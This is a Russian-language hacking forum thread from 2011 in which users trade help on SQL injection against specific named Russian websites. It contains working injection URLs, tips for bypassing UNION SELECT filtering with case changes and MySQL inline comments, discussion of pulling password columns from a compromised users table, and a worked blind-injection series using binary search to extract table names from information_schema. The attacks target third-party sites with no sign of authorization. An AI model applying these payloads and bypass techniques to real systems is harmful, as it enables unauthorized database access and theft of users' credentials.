Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    M_cript
    спасибо за помощь
    есть ещё вопросик
    есть скуля,но в ней фильтруется и and и union
    Code:
    http://www.shoptop.ru/sitemap.html?lim1=8250%27%20&&%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56%20#
    как обойти фильтрацию union select?
     
    #16901 Faaax, 3 Jun 2011
    Last edited: 3 Jun 2011
    1 person likes this.
  2. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    412
    Reputations:
    256
    Попробуй поменять регистр.
    Ну или /*!union*/ :cool:
     
  3. G.A.D

    G.A.D New Member

    Joined:
    16 Nov 2008
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте!
    Произвел sql inj.
    Есть таблица users в ней вся регистрационная информация о пользователях+(столб с названием pass). У всех пользователей в ячейках pass пусто.
    Что делать?
    Доступ к information schema закрыт.(Load_FILE тоже не работает).
    версия мускула 4.1.22-standard
     
  4. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    У 4 ветки information_schema нет
     
  5. G.A.D

    G.A.D New Member

    Joined:
    16 Nov 2008
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Ясно.
    Как быть?
     
  6. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    менял,бестолку:(
     
  7. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Крути как blind

    http://forum.antichat.ru/thread19844.html
     
  8. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    Выложи сайт, посмотрим.
     
  9. G.A.D

    G.A.D New Member

    Joined:
    16 Nov 2008
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Спасибо! Пробовал,не получается.
    Все поля кроме pass отображаются.
     
  10. G.A.D

    G.A.D New Member

    Joined:
    16 Nov 2008
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Всё Всем Спасибо!
    Вопрос снят в таблице два столбца с паролями!=)

    FlaktW +1 от меня=)
     
  11. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Разъяснить, как вы подобрали количество полей
    +orde+by+3 +--+
    +group+by+3+--+
    не проходят, или это простая подстановка +union+select+1,2,3+--+ в запрос
     
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    Товарисч сенсей, в MySQL запросах комментарий не обрамляется с обеих сторон пробелами.


    В SQLi-иньекциях, которые находятся в LIMIT'e, конструкция ORDER BY не допускается к использованию. Таков синтаксис языка.

    Ааа, ну ок. Вопросов больше не имею.
     
    #16912 Tigger, 4 Jun 2011
    Last edited: 5 Jun 2011
    2 people like this.
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Как такие скули, находятся. Запросы типа
    http://www.shoptop.ru/sitemap.html?lim1=8252-1
    http://www.shoptop.ru/sitemap.html?lim1=8252 and 1=0
    http://www.shoptop.ru/sitemap.html?lim1=8252 and true=false
    http://www.shoptop.ru/sitemap.html?lim1=8252*1
    на нее не указывают
    Проги Acunetix Web Vulnerability Scanner, WebCruiser ее не находят
     
  14. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Тут сразу видно, что используется limit, поэтому его дописываем, подбираем кол во полей вручную и комментарий.
    Знаю, так немного удобнее для меня.
     
    #16914 randman, 4 Jun 2011
    Last edited: 4 Jun 2011
  15. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    В этом посте явно видно, что использовалось какая-то программа, которая и указала на SQL-inj
     
    #16915 FlaktW, 4 Jun 2011
    Last edited: 4 Jun 2011
  16. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    Code:
    divantvplus.ru/index.html?id=390%20and%201=2+union+select+1,2,3,4,5,6,7,8,9,10,11--+
    
    Не могу разобрать почему отображается так?!
     
  17. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,600
    Likes Received:
    1,308
    Reputations:
    1,557
    Потому что значение поля 6 используется скриптом для вывода данных.
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0x35,1,1,1,1,1--+
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0x36,1,1,1,1,1--+
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0x31,1,1,1,1,1--+
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0x30,1,1,1,1,1--+

    Имеем 4 различных состояния. При использовании бинарного поиска на один символ максимум 4 запроса.
     
    #16917 M_script, 5 Jun 2011
    Last edited: 5 Jun 2011
    1 person likes this.
  18. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    Cпасибо! Первый раз с подобным встречаюсь. Что дальше? Можно прямо ссылкой на фак.
     
    #16918 ReV0LVeR, 5 Jun 2011
    Last edited: 5 Jun 2011
  19. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,600
    Likes Received:
    1,308
    Reputations:
    1,557
    Пример получения первого символа запроса "select group_concat(table_name) from information_schema.tables where table_name like '%user%'"

    Code:
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>128,if(@x>196,0,1),if(@x>64,5,6)),1,1,1,1,1--+
    Возвращает страницу 5. Код символа в диапазоне (64;128]

    Code:
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>96,if(@x>112,0,1),if(@x>80,5,6)),1,1,1,1,1--+
    Возвращает страницу 5. Код символа в диапазоне (80;96]

    Code:
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>88,if(@x>92,0,1),if(@x>84,5,6)),1,1,1,1,1--+
    Возвращает страницу 5. Код символа в диапазоне (84;88]

    Code:
    http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>86,if(@x>87,0,1),if(@x>85,5,6)),1,1,1,1,1--+
    Возвращает страницу 6. Код символа равен 85
     
    1 person likes this.
  20. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    Объясни мне детально вот эту часть запроса:
    Code:
    ,1,1))))>128,if(@x>196,0,1),if(@x>64,5,6))
    
    Посимвольно)
    Cпасибо.
     
Loading...
Thread Status:
Not open for further replies.